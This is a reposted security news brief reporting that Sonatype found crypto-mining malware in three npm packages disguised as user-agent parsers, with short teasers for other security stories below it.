[TheRecord] Crypto-miner found hidden inside three npm libraries

DevOps security firm Sonatype has uncovered crypto-mining malware hidden inside three JavaScript libraries uploaded on the official npm package repository.

The three files, disguised as user-agent string parsers, would detect the user’s operating system and then run a BAT or Shell script, based on the victim’s platform.

“These scripts then download an externally-hosted EXE or a Linux ELF, and execute the binary with arguments specifying the mining pool to use, the wallet to mine cryptocurrency for, and the number of CPU threads to utilize,” said Sonatype security researcher Ali ElShakankiry, who discovered the campaign.

This campaign’s specifics include:

The names of the three npm packages were: klowklownokhsa.The packages were live only for a day, on October 15.None of the three libraries were downloaded more than 150 times, individually.The final payloads (cryptominers) could run on Windows or Linux platforms.All three packages were uploaded from the same account.

The number of malicious packages uploaded on the npm repository has been rising, but this is actually a good thing rather than a negative aspect, as this is the byproduct of companies like Snyk and Sonatype constantly monitoring new uploads and package updates for malicious code and catching miscreants before they do more damage and before packages are downloaded thousands of times in real-world projects.

The post Crypto-miner found hidden inside three npm libraries appeared first on The Record by Recorded Future.

Source: Read More (The Record by Recorded Future)

You might be interested in …

[SecurityWeek] eCommerce Fraud Prevention Firm Riskified Prices IPO at $21 Per Share

All posts, Security Week

Israel-based ecommerce fraud prevention company Riskified has announced the pricing of its initial public offering (IPO) as it prepares to start trading publicly on the New York Stock Exchange. read more Source: Read More (SecurityWeek RSS Feed)

Read More

[ZDNet] Mozilla ends support for Firefox Lockwise password management app, strands iOS users

All posts, ZDNet

Password management app to be replaced by functionality already existing in the Firefox browser. Source: Read More (Latest topics for ZDNet in Security)

Read More

[ThreatPost] Apple’s NSO Group Lawsuit Amps Up Pressure on Pegasus Spyware-Maker

All posts, ThreatPost

Just weeks after a judge ruled that NSO Group did not have immunity in a suit brought by Facebook subsidiary WhatsApp, Apple is adding significant weight to the company’s woes. Source: Read More (Threatpost)

Read More